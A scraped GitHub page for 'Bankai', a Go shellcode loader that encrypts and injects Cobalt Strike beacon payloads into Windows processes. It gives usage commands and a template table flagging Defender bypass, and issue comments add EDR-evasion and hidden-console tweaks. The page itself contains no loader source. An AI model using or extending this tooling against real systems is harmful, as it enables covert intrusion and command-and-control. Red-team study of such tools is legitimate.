Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.



Bankai

Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project to mainly educate myself learning Go and directly executing shellcode into the target Windows system using various techniques.

Encryption - I implemented a simple payload encryption process (IV --> AES --> XOR --> Base64) that I learned while studying for SLAE32. This is mainly for protecting Cobalt Strike payload when it's moved over to the target host. The final compiled payload will include a decrypt function within.

Templates - Templates are the skeleton scripts to generate a final payload per each technique.

Installation

git clone https://github.com/bigb0sss/bankai.git
GO111MODULE=off go build bankai.go

Usage & Example

Generate a Cobalt Strike payload:



./bankai -h                       

     _                 _         _ 
    | |               | |       (_)
    | |__   __ _ _ __ | | ____ _ _ 
    | '_ \ / _' | '_ \| |/ / _' | |
    | |_) | (_| | | | |   < (_| | |
    |_.__/ \__,_|_| |_|_|\_\__,_|_|
                        [bigb0ss]

    [INFO] Another Go Shellcode Loader

 
    Required:
    -i            Binary File (e.g., beacon.bin)
    -o            Payload Output (e.g, payload.exe)
    -t            Payload Template (e.g., win32_VirtualProtect.tmpl)
    -a            Arch (32|64)
    
    Optional:
    -h            Print this help menu
    -p            PID

    Templates:                                        Last update: 06/07/21
    +--------------------------------------+-----------+------------------+
    | Techniques                           | PID       | Bypass Defender  |
    +--------------------------------------+-----------+------------------+
    | win32_VirtualProtect.tmpl            |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateFiber.tmpl               |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThreadNative.tmpl  | Required  |        Yes       | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThread.tmpl              |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EtwpCreateEtwThread.tmpl       |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_Syscall.tmpl                   |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadpoolWait.tmpl      |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumerateLoadedModules.tmpl    |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumChildWindows.tmpl          |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThread.tmpl        | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_RtlCreateUserThread.tmpl       | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadNative.tmpl        |           |        No        | 
    +--------------------------------------+-----------+------------------+

    Example:

    ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64
    [INFO] Key: SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateThread.tmpl
    [INFO] InputFile: beacon.bin
    [INFO] OutputFile: payload.exe

    ./bankai -i beacon64.bin -o payload.exe -t win64_CreateRemoteThread.tmpl -a 64 -p 7720
    [INFO] Key: 3mOL2Ne5XIW4xCieiR7cPmHtw4o737Do
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateRemoteThread.tmpl
    [INFO] InputFile: beacon64.bin
    [INFO] OutputFile: payload.exe

Credits / Acknowledgments / References

All of the work is inspired and done by the following researchers/projects:

Todo

  • Add more shellcode injection technique templates
  • Add AlternativeShellcodeExec techniques that Ali and Alfaro found
  • Test these shellcodes with modified malleableC2 profiles

Change Log

06/02/21
  • Added win64_CreateThreadpoolWait.tmpl
  • Added win64_EnumerateLoadedModules.tmpl
  • Added win64_EnumChildWindows.tmpl
  • Updated some error handling
06/07/21
  • Added win64_EnumPageFilesW.tmpl
  • Added win64_CreateRemoteThread.tmpl
  • Added win64_RtlCreateUserThread.tmpl
  • Added win64_CreateThreadNative.tmpl
Owner
bigb0ss
OSWE | OSCE | OSCP | Offensive Security Consultant Pentesting, RedTeam, ExpDev, Application Security
bigb0ss
https://github.com/bigb0sss/Bankai
Similar Resources

There is a certain amount of work to be done before you can implement the features of your Go powered CLI app

go-project-template-cli There is a certain amount of work to be done before you can implement the features of your Go powered CLI app. A few of those

Jan 23, 2022

Golang-video-screensaver - A work in progress Microsoft Windows video screensaver implemented in Go

golang-video-screensaver A work in progress Microsoft Windows video screensaver

Sep 5, 2022

Another CLI framework for Go. It works on my machine.

Another CLI framework for Go. It works on my machine.

Command line interface framework Go framework for rapid command line application development

Dec 30, 2022

😎 Yet Another yes clone but in Golang

Yeah Output a string repeatedly until killed. Yet Another yes clone but in Golang. Usage Just like yes: yeah This will print "y" until the process is

Apr 7, 2022

Yet another Yogurt - An AUR Helper written in Go

Yet another Yogurt - An AUR Helper written in Go

Yay Yet Another Yogurt - An AUR Helper Written in Go Help translate yay: Transifex Features Advanced dependency solving PKGBUILD downloading from ABS

Jan 3, 2023

Yet another emojify command written in Go 🍜

Yet another emojify command written in Go 🍜

go-emojify Yet another emojify command written in Go 🍜 Installation $ go get github.com/yusukebe/go-emojify/cmd/go-emojify Usage $ go-emojify "I lov

Nov 7, 2021

Portal is a quick and easy command-line file transfer utility from any computer to another πŸ–₯️ 🌌 πŸ’»

Portal is a quick and easy command-line file transfer utility from any computer to another πŸ–₯️ 🌌 πŸ’»

Portal is a quick and easy command-line file transfer utility from any computer to another πŸ–₯️ 🌌 πŸ’»

Dec 27, 2022

CLI filters the contents of the csv file according to the filters from the another file.

filtercsv CLI filters the contents of the csv file according to the filters from the another file. Made to process big files by a lots of filters. By

Dec 2, 2021

A command line tool to prompt for a value to be included in another command line.

readval is a command line tool which is designed for one specific purposeβ€”to prompt for a value to be included in another command line. readval prints

Dec 22, 2021
Comments
  • Bug Fix: Line 131 is missing }

    Bug Fix: Line 131 is missing }

    According to the deployment tutorial you provided, an error occurred: image After debugging, it was found that the loop of 128 lines was missing },I added a character on line 131}.

  • [Feature Enhancement] BananaPhone

    [Feature Enhancement] BananaPhone

    This is worth adding as a template mate:

    https://github.com/C-Sto/BananaPhone

    "It's a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)" It will help with evading EDR.

  • [Bug] Console window visible

    [Bug] Console window visible

    You can fix this by adding a compiler flag. See updated code below:

    	cmd := exec.Command(
		"go",
		"build",
		"-ldflags=-s", // Using -s instructs Go to create the smallest output
		"-ldflags=-w", // Using -w instructs Go to create the smallest output
		"-ldflags=-H=windowsgui", // hide console window
		"-o", outputFile,
		"output/shellcode.go",
	)
  • [Bug] -p flag broken if statement

    [Bug] -p flag broken if statement

    You can fix the if statement with the below:

    	if opt.templates == "win64_CreateRemoteThreadNative.tmpl" && opt.pid == 0 || opt.templates == "win64_CreateRemoteThread.tmpl" && opt.pid == 0 || opt.templates == "win64_RtlCreateUserThread.tmpl" && opt.pid == 0 {
	fmt.Println("[ERROR] For this template, you must use PID (-p).")
	os.Exit(1)
Related tags
Command Line Bankai
A terminal designed for anyone to use and designed for any platform

A terminal designed for anyone to use and designed for any platform. Which includes the basic features of any terminal and includes friendly commands to perform tools such as ping, traceroute, generate key pairs, encrypt/decrypt, router security actions, etc. All of the source code is done in Go.

Jan 25, 2022
Minutes is a CLI tool for synchronizing work logs between multiple time trackers, invoicing, and bookkeeping software to make entrepreneurs' daily work easier.
 Minutes is a CLI tool for synchronizing work logs between multiple time trackers, invoicing, and bookkeeping software to make entrepreneurs' daily work easier.

Minutes is a CLI tool for synchronizing work logs between multiple time trackers, invoicing, and bookkeeping software to make entrepreneurs' daily work easier.

Aug 8, 2022
Brigodier is a command parser & dispatcher, designed and developed for command lines such as for Discord bots or Minecraft chat commands. It is a complete port from Mojang's "brigadier" into Go.

brigodier Brigodier is a command parser & dispatcher, designed and developed to provide a simple and flexible command framework. It can be used in man

Dec 15, 2022
Darktile is a GPU rendered terminal emulator designed for tiling window managers.
 Darktile is a GPU rendered terminal emulator designed for tiling window managers.

Darktile is a GPU rendered terminal emulator designed for tiling window managers.

Jan 3, 2023
The simple and easy-to-use program designed to watch user activity for Cloud Providers.

Cloud Agent The simple and easy-to-use program is designed to watch user activity and possible orphan clusters for Cloud Providers: Gardener GCP (work

Jun 6, 2022
a work time management CLI tool for any platform
 a work time management CLI tool for any platform

english |ζ—₯本θͺž jobgosh | job management tool made with golang for shell a multi-platform work time management CLI tool to track and improve your day to

May 16, 2022
Easily manage your work via command line

Wo Easily manage your work via command line Introduction Wo, is cli that provides it easy to manage your workspace. Wo provides to manipulating workfl

Dec 11, 2021
Plugin which makes tmux work and feel like i3wm

Tmux Tilish This is a plugin that makes tmux behave more like a typical dynamic window manager. It is heavily inspired by i3wm, and most keybindings a

Jan 7, 2023
This package to make it easy to work with env

Go Env This package to make it easy to work with env Example usage package main

Jan 30, 2022
A CLI tool for working with CloudWatch logs. It performs functions that I need at work.

CloudWatch Logs Utility A simple utility for working with CloudWatch Logs. AWS should probably build this themselves, but since they won't, I am here

Dec 31, 2021